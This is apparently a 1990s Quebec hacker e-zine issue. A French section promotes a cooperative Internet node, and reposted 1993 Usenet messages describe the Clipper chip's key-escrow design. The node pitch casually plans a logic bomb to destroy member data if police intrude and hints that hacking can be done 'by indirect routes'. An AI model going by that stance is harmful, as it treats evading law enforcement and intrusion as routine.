56,400, d'un bab en Australie jusque sur ton espace disque sur
LLC. Toutes les oprations que tu pourrais effectuer de LLC
n'importe quel site d'Internet se font en 56,4... Parce que ta
machine n'est plus qu'un dumb terminal, qui utilise LLC.
Naturellement, quand tu as d/l du stuff du Zimbabwe sur ton accs
disque, tu peux le ramener plus tard sur ta machine, sans tre en
connection avec Internet, en 1200 cette fois, si c'est le modem
que tu as. En bref, tu auras beau avoir un 286 avec un 1200 bauds
ou un 486-66 avec un 14,4... ton ordi ne te sert plus
rien
quand tu connectes avec LIBERT LIBERT CHRIE!...
Ceci dit, quand on vous promet du 56 mille-et-quelques
bauds, c'est si on a le moyen d'avoir une ligne directe. Sinon,
on va se dbrouiller avec un SLIP, une plus petite ligne qui
runne
14.4. On va fonctionner avec ce qui faut pour pas tre
obligs de charger des tarifs exhorbitants.
Ton espace disque, maintenant. Contrairement au pirate qui
se hacke un acompte Internet sur une universit quelconque, tu
n'auras pas besoin de commencer
zigonner pour installer les
1000 et 1 programmes (IRC, WAIS, etc.) qui rendent la vie sur
Internet plus fascinante. Nous allons les installer dans le root
de LLC, et tout le monde va y avoir accs. Pour ceux qui ont dj
essay, avec des acomptes pirats, vous savez que c'est souvent
loin d'tre du gteau d'installer ce stuff, et que a bouffe
beaucoup d'espace sur ton accs disque personnel. Alors, mon ami,
ton 2 megs va vraiment tre un 2 megs pour toi, pas pour des
programmes...
POURQUOI IL EST IMPORTANT DE SE PARTIR UN SITE INTERNET
MAINTENANT
Internet connat une progression de sa clientle d'environ
20% par mois. Au rythme actuel, on suppose que Internet va
commencer
refuser l'application de nouvelles nodes d'ici un ou
deux ans. Les packets ralentissent, voyez-vous. Si on ne se
grouille pas maintenant, on risque de se ramasser du mauvais ct
de la porte lorsqu'elle va se fermer.
LA COOPRATIVE
Certains d'entre vous on remarqu que je prononais le mot
"cooprative" de temps
autre. Ben oui! On est pas ici pour
faire du cash avec a (on vous l'a dit), juste pour aider
partir le systme. Alors, une fois que Kermit et les autres
officiers NPC auront fini les tudes prliminaires et les estims
financiers, on va runir tous ceux qui, d'ici l
, vont nous avoir
indiqu leur intrt, et on va se former en cooprative lgale,
avec un conseil d'administration, une charte et tout. Tous les
membres de la cooprative vont tre appels
mettre leur grain
de sel, tant au niveau des services que nous devrions offrir
qu'au niveau des prix que nous devrions charger. Ben oui! C'est
vous qui allez dcider du montant que vous voulez payer
chaque
mois! Et les livres sont accessibles
tous! Tu peux pas avoir
plus rglo que a, me semble (j'espre qu'Extatic Pursuer, qui
nous accusait dans un post de tenter de faire un coup d'argent,
lit cela). Qui dit cooprative dit aussi "parts sociales". Comme
pour les caisses populaires, chaque membre de la coop devra
verser un montant (qu'on dterminera ensemble), de faon
assurer
la coop un fond de roulement, et diminuer la somme
qu'il faudra emprunter aux banques, au nom de la coop.
Naturellement, comme pour tout organisme coopratif, ces parts
vous seront REMBOURSES
votre dpart. Les cooprants adhrants
auront de plus des avantages suprieurs aux simples usagers, s'il
y en a. Car -autre chose importante- j'estime que, une fois que
LLC va tre parti, seuls devraient avoir accs au systme, au
dbut du moins, ceux qui vont faire partie de la coop. Je ne
crois pas que, du moins
ses dbuts toujours, le systme puisse
servir plus d'une cinquantaine de personnes. Et il est hors de
question de prendre plus de monde que ce que nos possibilits
nous le permettront.
Pour ce qui est du "risque" financier, moi, si j'tais vous,
je ne m'inquiterais pas pour a. Voyez-vous, Internet, c'est du
Crack lectronique. C'est de l'opium servi en bits. Une chose
dont je suis absolument sr: quiconque a got une fois
IRC et
aux autres gadgets d'Internet est accro POUR LA VIE. Dans toute
la dope que j'ai prise au cours de ma vie, j'ai jamais rencontr
quelque chose d'aussi insidieux!
DE LA PRESENCE DE NPC SUR UNE NODE LEGALE...
Je sais que a en inquite quelques-uns. Des pirates sur une
node lgale? On va se faire crisser
la porte d'Internet et on
va perdre tout notre fric! Ben non, on va pas se faire montrer la
porte... parce que tout ce qui va se passer sur LLC va tre
(probablement) lgal. On a bien fait des farces sur les babs
warez pirates que vous pourriez vous ouvrir sur votre espace
disque, mais, en ralit, a va tre interdit. Formellement
interdit. Catgoriquement interdit. Et pour ce qui est des
fichiers illgaux que vous pourriez aller chercher ailleurs...
ben vous vous dpcherez
les amener chez vous, au lieu de les
laisser dormir dans le ventre de LLC. Une fois par semaine (on
vous prviendra du jour et de l'heure ;-) , nous ferons un sweep
du disque dur et effacerons tous les fichiers illgaux.
Au niveau de la scurit, nous serons encore plus
impitoyables. L'inscription des nouveaux membres sera scrute
la loupe. Toute personne qui ne montrera pas patte blanche sera
rejete. Les appels vont tre traits avec un genre de Maestro
CHAQUE fois que vous allez logger. Si vous appelez avec *67 (ce
que vous n'avez AUCUNE raison de faire), vous ne connecterez pas.
Si vous appelez d'une autre machine que la vtre, vous ne
connecterez pas (dsols!). Les mots de passe vont devoir
respecter des formats bien stricts. Les "abc123" ou les
"megadeth" n'auront pas leur place sur LLC. Nous connaissons le
pouvoir de Jack ou de Hack ou de Hades, et nous allons exiger des
mots de passe qui n'existent en aucune langue (mme pas
Klingon!), un mlange de chiffres, de lettres et de caractres
ASCII (commencez pas
me rtorquer que les chiffres et les
lettres sont aussi des caractres ASCII!).
En retour, nous vous garantissons un systme virus free,
nous vous garantissons que votre fiche d'inscription, une fois
que nous serons tout
fait srs de votre identit et que vous
tes inscrits, votre fiche d'inscription, donc, va disparatre
dans le fond d'un coffret de sret
la banque, et que jamais,
au grand JAMAIS, un sale coche ne pourra mettre la main dessus.
LLC ne conservera que votre numro de tlphone, dment encrypt,
et rigg sur une bombe logique, en cas d'intrusion des forces de
l'ordre.
Certains services devront aussi tre restreints, comme de se
mettre dans une liste d'envoi d'une confrence USENET. Vous
devrez prvenir le sysop auparavant. Trop de gens s'amusent
inscrire de pauvres victimes sur toutes les listes qu'ils
trouvent (des milliers), et le systme de la victime explose
bientt sous l'avalanche de la mail. Une mailbomb est une
terrible chose... et il n'y en aura pas sur LLC.
Quiconque sera pinc en train de hacker un autre systme
DIRECTEMENT
partir de LLC va aussi avoir des petits problmes.
Comme s'il n'y avait pas moyen de faire a par des systmes
dtourns...
La scurit de nos usagers et du systme nous tient
coeur.
La lgalit de notre systme nous tient
coeur aussi.
Dans quelques semaines, tous ceux dont nous avons le nom
seront convoqus.
LLC s'en vient! Le bonheur est
nos portes! Le paradis
virtuel vous ouvre les bras!
Moomannnnnnnnn!
----------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
----------------------------------------------------------------
CLIPPER, UN RESUME
par Kermit
Clipper: encore un problme trs amricain... Mais, il
faudrait peut-tre, juste en cas, s'informer de comment ces gens-
l
dealent avec ce nouveau projet. Des fois que a s'en viendrait
pour nous.. Les textes qui suivent viennent tous de USENET, le
rseau de mail mondial. Ils en disent beaucoup plus que je ne
pourrais possiblement le faire. Lisez-les, a en vaut la
peine..
Newsgroups: sci.crypt,alt.privacy.clipper
Subject: Clipper chip -- technical details
Organization: AT&T Bell Laboratories
I received the following two notes from Martin Hellman with
details on how Clipper will work. They are posted with his
permission. The implications of some details are fascinating.
-------
From: "Martin Hellman" <hellman@isl.stanford.edu>
Subject: Clipper Chip
Most of you have seen the announcement in Friday's NY Times, etc.
about NIST (National Institute of Standards & Technology)
announcing the "Clipper Chip" crypto device. Several messges on
the net have asked for more technical details, and some have been
laboring under understandable misunderstandings given the lack of
details in the news articles. So here to help out is your
friendly NSA link: me. I was somewhat surprised Friday to get a
call from the Agency which supplied many of the missing details.
I was told the info was public, so here it is (the cc of this to
Dennis Branstad at NIST is mostly as a double check on my facts
since I assume he is aware of all this; please let me know if I
have anything wrong):
The Clipper Chip will have a secret crypto algorithm embedded in
Silicon. Each chip will have two secret, 80-bit keys. One will be
the same for all chips (ie a system-wide key) and the other will
be unit specific. I don't know what NIST and NSA will call them,
but I will call them the system key SK and unit key UK in this
message. The IC will be designed to be extremely difficult to
reverse so that the system key can be kept secret. (Aside: It is
clear that they also want to keep the algorithm secret and, in my
opinion, it may be as much for that as this stated purpose.) The
unit key will be generated as the XOR of two 80-bit random
numbers K1 and K2 (UK=K1+K2) which will be kept by the two escrow
authorities. Who these escrow authorities will be is still to be
decided by the Attorney General, but it was stressed to me that
they will NOT be NSA or law enforcement agencies, that they must
be parties acceptable to the users of the system as unbiased.
When a law enforcement agency gets a court order, they will
present it to these two escrow authorities and receive K1 and K2,
thereby allowing access to the unit key UK.
In addition to the system key, each user will get to choose his
or her own key and change it as often as desired. Call this key
plain old K. When a message is to be sent it will first be
encrypted under K, then K will be encrypted under the unit key
UK, and the serial number of the unit added to produce a three
part message which will then be encrypted under the system key SK
producing
E{ E[M; K], E[K; UK], serial number; SK}
When a court order obtains K1 and K2, and thence K, the law
enforcement agency will use SK to decrypt all information flowing
on the suspected link [Aside: It is my guess that they may do
this constantly on all links, with or without a court order,
since it is almost impossible to tell which links over which a
message will flow.] This gives the agency access to
E[M; K], E[K; UK], serial number
in the above message. They then check the serial number of the
unit and see if it is on the "watch list" for which they have a
court order. If so, they will decrypt E[K; UK] to obtain K, and
then decrypt E[M; K] to obtain M.
I am still in the process of assessing this scheme, so please do
not take the above as any kind of endorsement of the proposed
scheme. All I am trying to do is help all of us assess the scheme
more knowledgably. But I will say that the need for just one
court order worries me. I would feel more comfortable (though not
necessarily comfortable!) if two separate court orders were
needed, one per escrow authority. While no explanation is needed,
the following story adds some color: In researching some ideas
that Silvio Micali and I have been kicking around, I spoke with
Gerald Gunther, the constitutional law expert here at Stanford
and he related the following story: When Edward Levi became Pres.
Ford's attorney general (right after Watergate), he was visited
by an FBI agent asking for "the wiretap authorizations." When
Levy asked for the details so he could review the cases as
required by law, the agent told him that his predecessors just
turned over 40-50 blank, signed forms every time. Levi did not
comply and changed the system, but the lesson is clear: No single
person or authority should have the power to authorize wiretaps
(or worse yet, divulging of personal keys). Sometimes he or she
will be an Edward Levi and sometimes a John Mitchell.
Martin Hellman
----
From: "Martin Hellman" <hellman@isl.stanford.edu>
Object: Re: Clipper Chip
It is fine to post my previous message to sci.crypt if you also
post this message with it in which:
1. I ask recipients to be sparse in their requesting further info
from me or asking for comments on specific questions. By this
posting I apologize for any messages I am unable to respond to.
(I already spend too much time answering too much e-mail and am
particularly overloaded this week with other responsibilities.)
2. I note a probably correction sent to me by Dorothy Denning.
She met with the person from NSA that I talked with by phone, so
her understanding is likely to better than mine on this point:
Where I said the transmitted info is E{ E[M; K], E[K; UK],
serial number; SK} she says the message is not double encrypted.
The system key (or family key as she was told it is called) only
encrypts the serial number or the serial number and the encrypted
unit key. This is not a major difference, but I thought it should
be mentioned and thank her for bringing it to my attention. It
makes more sense since it cuts down on encryption computation
overhead.
Newsgroups: sci.crypt,alt.privacy.clipper
Subject: Re: Clipper chip -- technical details
Organization: AT&T Bell Laboratories
Nothing was said about where K_P comes from. It's the session
key, though, and it's chosen however you usually choose session
keys --- exponential key exchange, shared secret, RSA, etc. But
however you choose it, the chip will apparently emit the escrow
header when you do.
Newsgroups: sci.crypt,alt.privacy.clipper
From: smb@research.att.com (Steven Bellovin)
Subject: More technical details
Organization: AT&T Bell Laboratories
Here are some corrections and additions to Hellman's note,
courtesy of Dorothy Denning. Again, this is reposted with
permission.
Two requests -- first, note the roles of S1 and S2. It appears
to me and others that anyone who knows those values can construct
the unit key. And the nature of the generation process for K1
and K2 is such that neither can be produced alone. Thus, the
scheme cannot be implemented such that one repository generates
the first half-key, and another generates the second. *That* is
ominous.
Second -- these postings are not revealed scripture, nor are they
carefully-crafted spook postings. Don't attempt to draw out
hidden meanings (as opposed to, say, the official announcements
of Clipper).
Leave Denning out of this; given Hellman's record of opposition
to DES, which goes back before some folks on this newsgroup knew
how to read, I don't think you can impugn his integrity.
Oh yeah -- the folks who invented Clipper aren't stupid. If you
think something doesn't make sense, it's almost certainly because
you don't understand their goals.
--Steve Bellovin
-----
From: denning@cs.georgetown.edu (Dorothy Denning)
Subject: Re: Clipper Chip
I was also briefed by the NSA and FBI, so let me add a few
comments to Marty's message:
The Clipper Chip will have a secret crypto algorithm
embedded in The algorithm operates on 64-bit blocks (like DES)
and the chip supports all 4 DES modes of operation. The
algorithm uses 32 rounds of scrambling compared with 16 in DES.
In addition to the system key, each user will get to choose
his or her own key and change it as often as desired. Call this
key plain old K. When a message is to be sent it will first be K
is the session key shared by the sender and receiver. Any method
(e.g., public key) can be used to establish the session key. In
the AT&T telephone security devices, which will have the new
chip, the key is negotiated using a public-key protocol.
encrypted under K, then K will be encrypted under the unit
key UK, and the serial number of the unit added to produce a
three part message which will then be encrypted under the system
key SK producing
E{ E[M; K], E[K; UK], serial number; SK}
My understanding is that E[M; K] is not encrypted under SK
(called the "family key") and that the decrypt key corresponding
to SK is held by law enforcement. Does anyone have first hand
knowledge on this? I will also check it out, but this is 7am
Sunday so I did not want to wait.
The unit key will be generated as the XOR of two 80-bit
random numbers K1 and K2 (UK=K1+K2) which will be kept by the two
escrow The unit key, also called the "chip key," is generated
from the serial number N as follows. Let N1, N2, and N3 be 64
bit blocks derived from N, and let S1 and S2 be two 80-bit seeds
used as keys.
Compute the 64-bit block
R1 = E[D[E[N1; S1]; S2]; S1]
(Note that this is like using the DES in triple encryption mode
with two keys.) Similarly compute blocks R2 and R3 starting with
N2 and N3. (I'm unclear about whether the keys S1 and S2 change.
The fact that they're called seeds suggests they might.) Then
R1, R2, and R3 are concatenated together giving 192 bits. The
first 80 bits form K1 and the next 80 bits form K2. The
remaining bits are discarded.
authorities. Who these escrow authorities will be is still
to be decided by the Attorney General, but it was stressed to me
that they will NOT be NSA or law enforcement agencies, that they
must be parties acceptable to the users of the system as
unbiased.
Marty is right on this and the FBI has asked me for suggestions.
Please pass them to me along with your reasons. In addition to
Marty's criteria, I would add that the agencies must have an
established record of being able to safeguard highly sensitive
information. Some suggestions I've received so far include SRI,
Rand, Mitre, the national labs (Sandia, LANL, Los Alamos),
Treasury, GAO. When a court order obtains K1 and K2, and thence
K, the law enforcement agency will use SK to decrypt all
information flowing on the suspected link [Aside: It is my guess
that they may do this constantly on all links, with or without a
court order, since it is almost impossible to tell which links
over which a message will flow.]
My understanding is that there will be only one decode box and
that it will be operated by the FBI. The service provider will
isolate the communications stream and pass it to the FBI where it
will pass through the decode box, which will have been keyed with
K.
for "the wiretap authorizations." When Levy asked for the
details so he could review the cases as required by law, the
agent told him that his predecessors just turned over 40-50
blank, signed forms every time. Levi did not comply and changed
the system, but the lesson is clear: No single person or
authority should have the power to authorize wiretaps
No single person does, at least for FBI taps. After completing a
mound of paperwork, an agent must get the approval of several
people on a chain that includes FBI legal counsel before the
request is even taken to the Attorney General for final approval.
Dorothy Denning
From: denning@guvax.acc.georgetown.edu
Newsgroups: sci.crypt
Subject: THE CLIPPER CHIP: A TECHNICAL SUMMARY
Organization: Georgetown University
The following document summarizes the Clipper Chip, how it is
used, how programming of the chip is coupled to key generation
and the escrow process, and how law enforcement decrypts
communications. Since there has been some speculation on this
news group about my own involvement in this project, I'd like to
add that I was not in any way involved. I found out about it
when the FBI briefed me on Thursday evening, April 15. Since
then I have spent considerable time talking with the NSA and FBI
to learn more about this, and I attended the NIST briefing at the
Department of Commerce on April 16. The document below is the
result of that effort.
Dorothy Denning
---------------
THE CLIPPER CHIP: A TECHNICAL SUMMARY
Dorothy Denning
April 19, 1993
INTRODUCTION
On April 16, the President announced a new initiative that will
bring together the Federal Government and industry in a voluntary
program to provide secure communications while meeting the
legitimate needs of law enforcement. At the heart of the plan is
a new tamper-proof encryption chip called the "Clipper Chip"
together with a split-key approach to escrowing keys. Two escrow
agencies are used, and the key parts from both are needed to
reconstruct a key.
CHIP STRUCTURE
The Clipper Chip contains a classified 64-bit block encryption
algorithm called "Skipjack." The algorithm uses 80 bit keys
(compared with 56 for the DES) and has 32 rounds of scrambling
(compared with 16 for the DES). It supports all 4 DES modes of
operation. Throughput is 16 Mbits a second.
Each chip includes the following components:
the Skipjack encryption algorithm
F, an 80-bit family key that is common to all chips
N, a 30-bit serial number
U, an 80-bit secret key that unlocks all messages encrypted
with the chip
ENCRYPTING WITH THE CHIP
To see how the chip is used, imagine that it is embedded in the
AT&T telephone security device (as it will be). Suppose I call
someone and we both have such a device. After pushing a button
to start a secure conversation, my security device will negotiate
a session key K with the device at the other end (in general, any
method of key exchange can be used). The key K and message
stream M (i.e., digitized voice) are then fed into the Clipper
Chip to produce two values:
E[M; K], the encrypted message stream, and
E[E[K; U] + N; F], a law enforcement block.
The law enforcement block thus contains the session key K
encrypted under the unit key U concatenated with the serial
number N, all encrypted under the family key F.
CHIP PROGRAMMING AND ESCROW
All Clipper Chips are programmed inside a SCIF (secure computer
information facility), which is essentially a vault. The SCIF
contains a laptop computer and equipment to program the chips.
About 300 chips are programmed during a single session. The SCIF
is located at Mikotronx.
At the beginning of a session, a trusted agent from each of the
two key escrow agencies enters the vault. Agent 1 enters an
80-bit value S1 into the laptop and agent 2 enters an 80-bit
value S2. These values serve as seeds to generate keys for a
sequence of serial numbers.
To generate the unit key for a serial number N, the 30-bit value
N is first padded with a fixed 34-bit block to produce a 64-bit
block N1. S1 and S2 are then used as keys to triple-encrypt N1,
producing a 64-bit block R1:
R1 = E[D[E[N1; S1]; S2]; S1] .
Similarly, N is padded with two other 34-bit blocks to produce N2
and N3, and two additional 64-bit blocks R2 and R3 are computed:
R2 = E[D[E[N2; S1]; S2]; S1]
R3 = E[D[E[N3; S1]; S2]; S1] .
R1, R2, and R3 are then concatenated together, giving 192 bits.
The first 80 bits are assigned to U1 and the second 80 bits to
U2. The rest are discarded. The unit key U is the XOR of U1 and
U2. U1 and U2 are the key parts that are separately escrowed
with the two escrow agencies.
As a sequence of values for U1, U2, and U are generated, they are
written onto three separate floppy disks. The first disk
contains a file for each serial number that contains the
corresponding key part U1. The second disk is similar but
contains the U2 values. The third disk contains the unit keys U.
Agent 1 takes the first disk and agent 2 takes the second disk.
The third disk is used to program the chips. After the chips are
programmed, all information is discarded from the vault and the
agents leave. The laptop may be destroyed for additional
assurance that no information is left behind.
The protocol may be changed slightly so that four people are in
the room instead of two. The first two would provide the seeds
S1 and S2, and the second two (the escrow agents) would take the
disks back to the escrow agencies.
The escrow agencies have as yet to be determined, but they will
notbe the NSA, CIA, FBI, or any other law enforcement agency.
One or both may be independent from the government.
LAW ENFORCEMENT USE
When law enforcement has been authorized to tap an encrypted
line, they will first take the warrant to the service provider in
order to get access to the communications line. Let us assume
that the tap is in place and that they have determined that the
line is encrypted with Clipper. They will first decrypt the law
enforcement block with the family key F. This gives them E[K; U]
+ N. They will then take a warrant identifying the chip serial
number N to each of the key escrow agents and get back U1 and U2.
U1 and U2 are XORed together to produce the unit key U, and E[K;
U] is decrypted to get the session key K. Finally the message
stream is decrypted. All this will be accomplished through a
special black box decoder operated by the FBI.
ACKNOWLEDGMENT AND DISTRIBUTION NOTICE. All information is based
on information provided by NSA, NIST, and the FBI. Permission to
distribute this document is granted.
From: denning@guvax.acc.georgetown.edu
Newsgroups: sci.crypt
Subject: REVISED TECHNICAL SUMMARY OF CLIPPER CHIP
Organization: Georgetown University
Here is a revised version of my summary which corrects some
errors and provides some additional information and explanation.
THE CLIPPER CHIP: A TECHNICAL SUMMARY
Dorothy Denning
Revised, April 21, 1993
INTRODUCTION
On April 16, the President announced a new initiative that will
bring together the Federal Government and industry in a voluntary
program to provide secure communications while meeting the
legitimate needs of law enforcement. At the heart of the plan is
a new tamper-proof encryption chip called the "Clipper Chip"
together with a split-key approach to escrowing keys. Two escrow
agencies are used, and the key parts from both are needed to
reconstruct a key.
CHIP CONTENTS
The Clipper Chip contains a classified single-key 64-bit block
encryption algorithm called "Skipjack." The algorithm uses 80
bit keys (compared with 56 for the DES) and has 32 rounds of
scrambling (compared with 16 for the DES). It supports all 4 DES
modes of operation. The algorithm takes 32 clock ticks, and in
Electronic Codebook (ECB) mode runs at 12 Mbits per second.
Each chip includes the following components:
the Skipjack encryption algorithm
F, an 80-bit family key that is common to all chips
N, a 30-bit serial number (this length is subject to change)
U, an 80-bit secret key that unlocks all messages encrypted
with the chip
The chips are programmed by Mykotronx, Inc., which calls them the
"MYK-78." The silicon is supplied by VLSI Technology Inc. They
are implemented in 1 micron technology and will initially sell
for about $30 each in quantities of 10,000 or more. The price
should drop as the technology is shrunk to .8 micron.
ENCRYPTING WITH THE CHIP
To see how the chip is used, imagine that it is embedded in the
AT&T telephone security device (as it will be). Suppose I call
someone and we both have such a device. After pushing a button
to start a secure
conversation, my security device will negotiate
an 80-bit session key K with the device at the other end. This
key negotiation takes place without the Clipper Chip. In
general, any method of key exchange can be used such as the
Diffie-Hellman public-key distribution method.
Once the session key K is established, the Clipper Chip is used
to encrypt the conversation or message stream M (digitized
voice). The telephone security device feeds K and M into the
chip to produce two values:
E[M; K], the encrypted message stream, and
E[E[K; U] + N; F], a law enforcement field ,
which are transmitted over the telephone line. The law
enforcement field thus contains the session key K encrypted under
the unit key U concatenated with the serial number N, all
encrypted under the family key F. The law enforcement field is
decrypted by law enforcement after an authorized wiretap has been
installed.
The ciphertext E[M; K] is decrypted by the receiver's device
using the session key:
D[E[M; K]; K] = M .
CHIP PROGRAMMING AND ESCROW
All Clipper Chips are programmed inside a SCIF (Secure
Compartmented Information Facility), which is essentially a
vault. The SCIF contains a laptop computer and equipment to
program the chips. About 300 chips are programmed during a
single session. The SCIF is located at Mykotronx.
At the beginning of a session, a trusted agent from each of the
two key escrow agencies enters the vault. Agent 1 enters a
secret, random 80-bit value S1 into the laptop and agent 2 enters
a secret, random 80-bit value S2. These random values serve as
seeds to generate unit keys for a sequence of serial numbers.
Thus, the unit keys are a function of 160 secret, random bits,
where each agent knows only 80.
To generate the unit key for a serial number N, the 30-bit value
N is first padded with a fixed 34-bit block to produce a 64-bit
block N1. S1 and S2 are then used as keys to triple-encrypt N1,
producing a 64-bit block R1:
R1 = E[D[E[N1; S1]; S2]; S1] .
Similarly, N is padded with two other 34-bit blocks to produce N2
and N3, and two additional 64-bit blocks R2 and R3 are computed:
R2 = E[D[E[N2; S1]; S2]; S1]
R3 = E[D[E[N3; S1]; S2]; S1] .
R1, R2, and R3 are then concatenated together, giving 192 bits.
The first 80 bits are assigned to U1 and the second 80 bits to
U2. The rest are discarded. The unit key U is the XOR of U1 and
U2. U1 and U2 are the key parts that are separately escrowed
with the two escrow agencies.
As a sequence of values for U1, U2, and U are generated, they are
written onto three separate floppy disks. The first disk
contains a file for each serial number that contains the
corresponding key part U1. The second disk is similar but
contains the U2 values. The third disk contains the unit keys U.
Agent 1 takes the first disk and agent 2 takes the second disk.
Thus each agent walks away knowing an 80-bit seed and the 80-bit
key parts. However, the agent does not know the other 80 bits
used to generate the keys or the other 80-bit key parts.
The third disk is used to program the chips. After the chips are
programmed, all information is discarded from the vault and the
agents leave. The laptop may be destroyed for additional
assurance that no information is left behind.
The protocol may be changed slightly so that four people are in
the room instead of two. The first two would provide the seeds
S1 and S2, and the second two (the escrow agents) would take the
disks back to the escrow agencies.
The escrow agencies have as yet to be determined, but they will
not be the NSA, CIA, FBI, or any other law enforcement agency.
One or both may be independent from the government.
LAW ENFORCEMENT USE
When law enforcement has been authorized to tap an encrypted
line, they will first take the warrant to the service provider in
order to get access to the communications line. Let us assume
that the tap is in place and that they have determined that the
line is encrypted with the Clipper Chip. The law enforcement
field is first decrypted with the family key F, giving E[K; U] +
N. Documentation certifying that a tap has been authorized for
the party associated with serial number N is then sent (e.g., via
secure FAX) to each of the key escrow agents, who return (e.g.,
also via secure FAX) U1 and U2. U1 and U2 are XORed together to
produce the unit key U, and E[K; U] is decrypted to get the
session key K. Finally the message stream is decrypted. All
this will be accomplished through a special black box decoder.
CAPSTONE: THE NEXT GENERATION
A successor to the Clipper Chip, called "Capstone" by the
government and "MYK-80" by Mykotronx, has already been developed.
It will include the Skipjack algorithm, the Digital Signature
Standard (DSS), the Secure Hash Algorithm (SHA), a method of key
exchange, a fast exponentiator, and a randomizer. A prototoype
will be available for testing on April 22, and the chips are
expected to be ready for delivery in June or July.
ACKNOWLEDGMENT AND DISTRIBUTION NOTICE. This article is based on
information provided by NSA, NIST, FBI, and Mykotronx.
Permission to distribute this document is granted.
From: psionic@wam.umd.edu (Haywood J. Blowme)
Subject: new encryption
Organization: University of Maryland, College Park
As promised, I spoke today with the company mentioned in a
Washington Times article about the Clipper chip announcement. The
name of the company is Secure Communicatiions Technology
(Information will be given at the end of this message on how to
contact them).
Basically they are disturbed about the announcement for many
reasons that we are. More specifically however, Mr. Bryen of
Secure Communications brought to light many points that might
interest most of the readers.
His belief is that AT&T was made known of the clipper well
before the rest of the industry. This is for several reasons,
several of which are:
- A company of AT&T's size could never be able to make a
decision to use the new chip on the SAME DAY it was announced.
- Months ago they proposed using their own chip for AT&T's
secure telephone devices. AT&T basically blew them off as being
not interested at all. This stuck them as strange, until now...
Also I spoke with Art Melnick, their cryptographer, he
expressed several concerns over the new Clipper Chip:
- The obvious backdoor will be able to let many people decrypt
the code.
- Once the key is released to authorities the security of the
crypto system is lost forever. These keys can end up in the hands
of any agency of the government.
- The fact that the escrowed keys never change means that the
algorithm is vulnerable over time to an attacker.
- The classified algorithm may hide another backdoor. But he
feels that it is probably to keep people from forging fake serial
numbers, or changing the keys themselves.
- Additionally he feels that the NSA has probably spent enough
time and money in working on a way to keep this chip from being
reversed engineered, that he feels that reverse engineering it
will be very difficult to do. He feels that they have developed a
suitable technique to protect the chip from this attack. Also he
feels that the chip is hardware encoded with the algorithm and
not microcoded onto the chip.
Additonally I spoke with Mr. Melnick about their algorithm. He
couldn't tell me much about their new agorithm because it hasn't
been patented yet. However he told me a little:
- The algorithm will be released for public review after patents
have been granted for it. This is so the crypto community can see
that it is secure.
- The algorithm is called NEA for New Encryption Algorithm. The
details were sketchy because now it is held as a trade secret
until the patent was issued, but I was told that it will
incorporate the following:
- It will have fast encryption of data (Exact specs not
given, but Mr. Melnick stated "Much faster than what an RS-232
can put out.")
- It is a symmetric cipher, just like IDEA and DES.
- It will use 64 bit data blocks for encryption (like DES and
IDEA).
- The key length was not given to me, but Mr. Melnick states
that it is _adujustable_ and is "More than adequate for
security."
- The algorithm is written in C and Assembler in software
form, and can be ported to many platforms (Unlike the the Clipper
Chip which is hardware ONLY and cannot be made into software)
This I consider a definite plus for the NEA for widespread use.
- The algorithm will accomodate public key distribution
techniques such as RSA or Diffie-Hellman. This will also be
supported in the hardware chip.
- Right now the projected cost of the NEA chip will be about
10 dollars for each!! (Clipper will run 25 each chip [that is if
it is produced enough, which probably won't happen]).
- They currently sell a program called C-COM that uses the
algorithm and a special streaming protocol that does not divide
the encrypted data into "blocks." This could prevent plaintext
attacks if you know what the block header is. This program
operates at all supported RS-232 speeds and uses the software
implementation of the algorithm.
- Most importantly: IT DOES NOT HAVE A BACKDOOR!!
Right now the company is afraid that the new clipper chip will
put them out of business. This is a very real possibility. So
they really need help in stopping the clipper chip from becoming
a standard. If you want to contact them, they can be reached at..
Secure Communications Technology
8700 Georgia Ave. Suite 302
Silver Spring, MD
(301) 588-2200
I talked to Mr. Bryen who represents the company. He can answer
any questions you have.
=================================================================
CLIPPER CHIP TECHNOLOGY
CLIPPER is an NSA developed, hardware oriented, cryptographic
device that implements a symmetric encryption/decryption
algorithm and a law enforcement satisfying key escrow system.
While the escrow management system design is not completely
designed, the cryptographic algorithm (SKIPJACK) is completely
specified (and classified SECRET).
The cryptographic algorithm (called CA in this paper) has the
following characteristics:
1. Symmetric, 80-bit key encryption/decryption algorithm;
2. Similar in function to DES (i.e., basically a 64-bit
code book transformation that can be used in the same
four modes of operation as specified for DES in FIPS
81);
3. 32 rounds of processing per single encrypt/decrypt
operation;
4. Design started by NSA in 1985; evaluation completed in
1990.
The CLIPPER CHIP is just one implementation of the CA. The
CLIPPER CHIP designed for the AT&T commercial secure voice
products has the following characteristics:
1. Functions specified by NSA; logic designed by
MYKOTRONX; chip fabricated by VLSI, Inc.: manufactured
chip programmed (made unique) by MYKOTRONX to security
equipment manufacturers willing to follow proper
security procedures for handling and storage of the
programmed chip; equipment sold to customers;
2. Resistant to reverse engineering against a very
sophisticated, well funded adversary;
3. 15-20 MB/S encryption/decryption constant throughout
once cryptographic synchronization is established with
distant CLIPPER Chip;
4. The chip programming equipment writes (one time) the
following information into a special memory (called
VROM or VIA-Link) on the chip:
a. (unique) serial number
b. (unique) unit key
c. family key
d. specialized control software
5. Upon generation (or entry) of a session key in the
chip, the chip performs the following actions:
a. Encrypts the 80-bit session key under the unit key
producing an 80-bit intermediate result;
b. Concatenates the 80-bit result with the 25-bit
serial number and a 23-bit authentication pattern
(total of 128 bits);
c. Enciphers this 128 bits with family key to produce
a 128-bit cipher block chain called the Law
Enforcement Field (LEF);
d. Transmits the LEF at least once to the intended
receiving CLIPPER chip;
e. The two communicating CLIPPER chips use this field
together with a random IV to establish
Cryptographic Synchronization.
6. Once synchronized, the CLIPPER chips use the session
key to encrypt/decrypt data in both directions;
7. The chips can be programmed to not enter secure mode if
the LEF field has been tampered with (e.g., modified,
superencrypted, replaced);
8. CLIPPER chips will be available from a second source in
the future;
9. CLIPPER chips will be modified and upgraded in the
future;
10. CLIPPER chips presently cost $16.00 (unprogrammed) and
$26.00 (programmed).
From: composer@Beyond.Dreams.ORG (Jeff Kellem)
Subject: quick non-technical writeup on Clipper Chip announcement
Organization: Beyond Dreams
Included below is an excerpt regarding the Clipper Chip
announcement from a column I write titled "What's Out There?".
It's primarily more for pointers on where to find more
information, and a quick non-technical sketch of the
announcement.
[ This excerpt was written over a week ago. ]
I'm posting the excerpt now, since the hardcopy won't be
available until June, 1993 and some people may find this of
interest. This excerpt is posted with permission, of course --
I'm the author. :)
FYI...
-jeff
Jeff Kellem
Internet: composer@Beyond.Dreams.ORG
